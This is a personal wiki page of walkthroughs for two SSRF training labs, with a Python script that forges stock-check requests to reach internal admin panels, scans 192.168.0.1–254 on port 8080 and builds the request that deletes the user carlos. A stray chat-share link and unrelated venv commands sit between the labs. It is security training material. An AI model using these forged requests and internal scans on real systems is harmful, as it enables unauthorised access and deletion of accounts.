
Server side request forgery (SSRF)

Alnoman Kamil edited this page Jun 12, 2024 · 25 revisions

This lab has a stock check feature which fetches data from an internal system. To solve the lab, change the stock check URL to access the admin interface at http://localhost/admin and delete the user carlos.

  • Solution

    1. Browse the site, open a product page and find the Check stock functionality.
    2. Intercept the Check stock request.
    3. In the request, set stockApi to http://localhost/admin (URL-encode it, ⌘ U) and forward it.
    4. Notice that the response now contains the admin panel: the /admin endpoint has been accessed through the stock checker.
    5. The delete button for carlos in that panel points to /admin/delete?username=carlos.
    6. Intercept Check stock again and set stockApi to http://localhost/admin/delete?username=carlos, delivering the SSRF attack that deletes the user.
https://chatgpt.com/share/f11e5ffc-be5b-4717-8dbf-2a9abfb807d3
`python3 -m venv .`
`source bin/activate`
`deactivate`

This lab has a stock check feature which fetches data from an internal system. To solve the lab, use the stock check functionality to scan the internal 192.168.0.X range for an admin interface on port 8080, then use it to delete the user carlos.

  • Solution
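The two procedures above (editing stockApi for the local-server lab, then sweeping 192.168.0.X:8080 for the second lab) as an added Python example; this is not code from this wiki page or from the PortSwigger labs. The stock-check path /product/stock, the admin-panel HTML, the host at .37 and the non-200 status for unreachable hosts are assumptions constructed so the example runs offline.

```python
import re
from urllib.parse import urlencode

# Assumed lab detail (not stated on the page): the stock checker is a POST to
# /product/stock whose form body carries the stockApi parameter.
STOCK_ENDPOINT = "/product/stock"


def stock_check_body(target_url: str) -> str:
    """Form body for the stock check with stockApi pointing at target_url.

    urlencode() applies the same percent-encoding as Burp's ⌘ U, so the
    ':' '/' '?' '=' in the target URL cannot break the outer parameter."""
    return urlencode({"stockApi": target_url})


def raw_request(host: str, target_url: str) -> str:
    """The full HTTP request that is forwarded after editing stockApi."""
    body = stock_check_body(target_url)
    return (
        f"POST {STOCK_ENDPOINT} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


def find_delete_link(admin_html: str, username: str):
    """Lab 1, step 5: pull the delete URL for `username` out of the admin panel."""
    pattern = r'href="(/admin/delete\?username=%s)"' % re.escape(username)
    match = re.search(pattern, admin_html)
    return match.group(1) if match else None


def internal_scan_targets(prefix: str = "192.168.0.", port: int = 8080):
    """Lab 2: one stockApi value per host 192.168.0.1-254 on port 8080."""
    return [f"http://{prefix}{x}:{port}/admin" for x in range(1, 255)]


def classify_response(status: int, body: str) -> str:
    """Triage a stock-check response fetched through stockApi.

    The admin host answers 200 with the user list; closed ports and dead
    hosts make the stock checker fail (assumed here to be a non-200 status)."""
    if status == 200 and "/admin/delete?username=" in body:
        return "admin-panel"
    if status == 200:
        return "other-200"
    return "no-service"


def scan_for_admin(fetch):
    """Run the lab-2 sweep. `fetch(target_url)` returns (status, body) for a
    stock check with stockApi=target_url; in Burp this is Intruder with the
    last octet of the address as the payload position."""
    for target in internal_scan_targets():
        status, body = fetch(target)
        if classify_response(status, body) == "admin-panel":
            return target
    return None


# Constructed sample of an admin panel; not captured from the lab.
SAMPLE_ADMIN_HTML = (
    "<h1>Users</h1>\n"
    '<span>wiener</span> <a href="/admin/delete?username=wiener">Delete</a>\n'
    '<span>carlos</span> <a href="/admin/delete?username=carlos">Delete</a>\n'
)


def fake_fetch(target_url: str):
    """Offline stand-in for the lab: only 192.168.0.37:8080 (assumed) serves the panel."""
    if target_url == "http://192.168.0.37:8080/admin":
        return 200, SAMPLE_ADMIN_HTML
    return 500, "Could not connect to external stock check service"


if __name__ == "__main__":
    # Lab 1: reach the admin panel, then replay with the delete URL it exposes.
    print(raw_request("lab.example", "http://localhost/admin"))
    link = find_delete_link(SAMPLE_ADMIN_HTML, "carlos")
    print(raw_request("lab.example", "http://localhost" + link))
    # Lab 2: find the internal host, then the same delete URL is sent to it.
    admin_host = scan_for_admin(fake_fetch)
    print("admin host:", admin_host)
    print(raw_request("lab.example", admin_host.rsplit("/admin", 1)[0] + link))
```

Against the real lab, the output of raw_request is what goes into Burp Repeater; for the sweep, the host octet in the stockApi value is the Intruder payload position and the classification is done by sorting on status code and response length.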